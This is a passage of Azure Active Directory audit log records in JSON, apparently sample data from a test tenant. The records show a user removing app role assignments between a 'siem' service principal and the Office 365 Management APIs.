"Value": "ac045271-8d7f-49b2-abc9-5130051d879f"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:06.3062012Z"}, {"Name": "env_epoch", "Value": "31CXC"}, {"Name": "env_seqNum", "Value": "38464425"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR556"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "7f09b681-251f-4ff0-97cf-5247891b6981"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": 
"2020-02-09T15:34:47", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": 
[{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "d37460cd-3d19-4ae9-9515-015f27036e74"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:47.4999796Z"}, {"Name": "env_epoch", "Value": 
"FYE60"}, {"Name": "env_seqNum", "Value": "51372061"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "02868191-019a-453a-a3a9-a21f44898778"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:47", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, 
{"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": 
"targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "d37460cd-3d19-4ae9-9515-015f27036e74"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:47.4999796Z"}, {"Name": "env_epoch", "Value": "FYE60"}, {"Name": "env_seqNum", "Value": "51372061"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, 
{"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "02868191-019a-453a-a3a9-a21f44898778"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:47", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "siem", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, 
{"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "d37460cd-3d19-4ae9-9515-015f27036e74"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": 
"[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:47.4999796Z"}, {"Name": "env_epoch", "Value": "FYE60"}, {"Name": "env_seqNum", "Value": "51372052"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "115f72b6-e8e6-4710-98e9-63ccd20bf2ec"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:47", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": 
"755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "siem", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": 
"755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "d37460cd-3d19-4ae9-9515-015f27036e74"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:47.4999796Z"}, {"Name": "env_epoch", "Value": "FYE60"}, {"Name": "env_seqNum", "Value": "51372061"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": 
"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "02868191-019a-453a-a3a9-a21f44898778"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:47", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": 
"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "siem", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "ServicePrincipal.AppId"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": 
"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "d37460cd-3d19-4ae9-9515-015f27036e74"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 